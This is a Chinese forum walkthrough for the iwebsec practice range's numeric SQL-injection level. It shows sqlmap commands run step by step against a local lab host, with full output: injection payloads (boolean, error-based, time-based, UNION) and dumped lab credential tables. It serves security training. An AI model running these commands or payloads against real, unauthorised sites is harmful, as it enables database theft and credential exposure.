iwebsec_wp

瑞星  金牌会员 | 2023-2-26 11:02:41 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 864|帖子 864|积分 2592

前言


  • 在线靶场:点击此处即可到达靶场地址-->>>iwebsec

2.本地搭建:使用官方所介绍的方法 点击跳转官网
iwebsec官网
(1)docker hub下载,命令 docker pull iwebsec/iwebsec
(2)VMware虚拟机环境下载地址链接:https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib 提取码: 0aib
iwebsec靶场配套书籍《Web安全原理分析与实践》
这里更加推荐使用本地环境。
sql注入漏洞

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
数字型注入


打开靶场注入点已给出

/01.php?id=1
sqlmap

使用sqlmap判断是否存在漏洞

sqlmap -u http://192.168.70.157/sqli/01.php?id=1
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1
  2.         ___
  3.        __H__
  4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . [,]     | .'| . |
  6. |___|_  [(]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:28:48
  10. [21:28:48] [INFO] resuming back-end DBMS 'mysql'
  11. [21:28:48] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:28:48] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:28:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  33. [*] shutting down at 21:28:48
复制代码
爆数据库名

记录sqlmap的使用方法
命令如下
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
  2.         ___
  3.        __H__
  4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . ["]     | .'| . |
  6. |___|_  [)]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:24:43
  10. [21:24:43] [INFO] resuming back-end DBMS 'mysql'
  11. [21:24:43] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:24:43] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:24:43] [INFO] fetching database names
  33. available databases [3]:
  34. [*] information_schema
  35. [*] iwebsec
  36. [*] test
  37. [21:24:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  38. [*] shutting down at 21:24:43
复制代码
爆数据库列名

这里以iwebsec为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
  2.         ___
  3.        __H__
  4. ___ ___[.]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . [(]     | .'| . |
  6. |___|_  [(]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:31:12
  10. [21:31:12] [INFO] resuming back-end DBMS 'mysql'
  11. [21:31:12] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:31:12] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:31:12] [INFO] fetching tables for database: 'iwebsec'
  33. Database: iwebsec
  34. [4 tables]
  35. +-------+
  36. | user  |
  37. | sqli  |
  38. | users |
  39. | xss   |
  40. +-------+
  41. [21:31:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  42. [*] shutting down at 21:31:13
复制代码
爆字段

这里可以看到有user,sqli,users,xss的表,接下来就是直接爆字段这里以user表为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
  2.         ___
  3.        __H__
  4. ___ ___[)]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . [.]     | .'| . |
  6. |___|_  [.]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:33:41
  10. [21:33:42] [INFO] resuming back-end DBMS 'mysql'
  11. [21:33:42] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:33:42] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:33:42] [INFO] fetching columns for table 'user' in database 'iwebsec'
  33. Database: iwebsec
  34. Table: user
  35. [3 columns]
  36. +----------+--------------+
  37. | Column   | Type         |
  38. +----------+--------------+
  39. | id       | int(11)      |
  40. | password | varchar(255) |
  41. | username | varchar(255) |
  42. +----------+--------------+
  43. [21:33:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  44. [*] shutting down at 21:33:42
复制代码
获取该字段中的信息

获取id账号密码信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
  2.         ___
  3.        __H__
  4. ___ ___[)]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . ["]     | .'| . |
  6. |___|_  [,]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:41:40
  10. [21:41:40] [INFO] resuming back-end DBMS 'mysql'
  11. [21:41:40] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:41:40] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:41:40] [INFO] fetching entries of column(s) 'id, password, username' for table 'user' in database 'iwebsec'
  33. Database: iwebsec
  34. Table: user
  35. [3 entries]
  36. +----+----------+----------+
  37. | id | password | username |
  38. +----+----------+----------+
  39. | 1  | pass1    | user1    |
  40. | 2  | pass2    | user2    |
  41. | 3  | pass3    | user3    |
  42. +----+----------+----------+
  43. [21:41:40] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
  44. [21:41:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  45. [*] shutting down at 21:41:40
复制代码
获取数据库所有用户信息

sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
  2.         ___
  3.        __H__
  4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . [,]     | .'| . |
  6. |___|_  [.]_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:44:37
  10. [21:44:37] [INFO] resuming back-end DBMS 'mysql'
  11. [21:44:37] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:44:37] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:44:37] [INFO] fetching database users
  33. database management system users [1]:
  34. [*] 'iwebsec'@'localhost'
  35. [21:44:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  36. [*] shutting down at 21:44:37
复制代码
直接枚举数据库信息

--current-db可以查看网站使用的当前数据库
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
点击查看代码
  1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
  2.         ___
  3.        __H__
  4. ___ ___["]_____ ___ ___  {1.2.3#stable}
  5. |_ -| . [)]     | .'| . |
  6. |___|_  [']_|_|_|__,|  _|
  7.       |_|V          |_|   http://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting at 21:26:09
  10. [21:26:09] [INFO] resuming back-end DBMS 'mysql'
  11. [21:26:09] [INFO] testing connection to the target URL
  12. sqlmap resumed the following injection point(s) from stored session:
  13. ---
  14. Parameter: id (GET)
  15.     Type: boolean-based blind
  16.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  17.     Payload: id=1 OR NOT 1065=1065#
  18.     Type: error-based
  19.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  20.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  21.     Type: AND/OR time-based blind
  22.     Title: MySQL >= 5.0.12 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24.     Type: UNION query
  25.     Title: Generic UNION query (NULL) - 3 columns
  26.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
  27. ---
  28. [21:26:09] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux CentOS 6.8
  30. web application technology: Apache 2.2.15, PHP 5.2.17
  31. back-end DBMS: MySQL >= 5.0
  32. [21:26:09] [INFO] fetching current database
  33. current database:    'iwebsec'
  34. [21:26:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
  35. [21:26:09] [INFO] fetching current database
  36. [21:26:09] [INFO] fetching tables for database: 'iwebsec'
  37. [21:26:09] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
  38. [21:26:09] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
  39. Database: iwebsec
  40. Table: sqli
  41. [7 entries]
  42. +----+-----------------------+------------------------------------------------------+----------+
  43. | id | email                 | username                                             | password |
  44. +----+-----------------------+------------------------------------------------------+----------+
  45. | 1  | user1@iwebsec.com     | user1                                                | pass1    |
  46. | 2  | user2@iwebsec.com     | user2                                                | pass2    |
  47. | 3  | user3@iwebsec.com     | user3                                                | pass3    |
  48. | 4  | user4@iwebsec.com     | admin                                                | admin    |
  49. | 5  | 123@123.com           | 123                                                  | 123      |
  50. | 6  | 1234@123.com          | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    | 123      |
  51. | 7  | iwebsec02@iwebsec.com | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# | 123456   |
  52. +----+-----------------------+------------------------------------------------------+----------+
  53. [21:26:09] [INFO] table 'iwebsec.sqli' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/sqli.csv'
  54. [21:26:09] [INFO] fetching columns for table 'xss' in database 'iwebsec'
  55. [21:26:09] [INFO] fetching entries for table 'xss' in database 'iwebsec'
  56. Database: iwebsec
  57. Table: xss
  58. [1 entry]
  59. +----+---------+
  60. | id | name    |
  61. +----+---------+
  62. | 1  | iwebsec |
  63. +----+---------+
  64. [21:26:09] [INFO] table 'iwebsec.xss' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/xss.csv'
  65. [21:26:09] [INFO] fetching columns for table 'user' in database 'iwebsec'
  66. [21:26:09] [INFO] fetching entries for table 'user' in database 'iwebsec'
  67. Database: iwebsec
  68. Table: user
  69. [3 entries]
  70. +----+----------+----------+
  71. | id | username | password |
  72. +----+----------+----------+
  73. | 1  | user1    | pass1    |
  74. | 2  | user2    | pass2    |
  75. | 3  | user3    | pass3    |
  76. +----+----------+----------+
  77. [21:26:09] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
  78. [21:26:09] [INFO] fetching columns for table 'users' in database 'iwebsec'
  79. [21:26:09] [INFO] fetching entries for table 'users' in database 'iwebsec'
  80. Database: iwebsec
  81. Table: users
  82. [1 entry]
  83. +-------+----------+-------------+
  84. | role  | username | password    |
  85. +-------+----------+-------------+
  86. | admin | orange   | mall123mall |
  87. +-------+----------+-------------+
  88. [21:26:09] [INFO] table 'iwebsec.users' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/users.csv'
  89. [21:26:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
  90. [*] shutting down at 21:26:09
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

瑞星

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表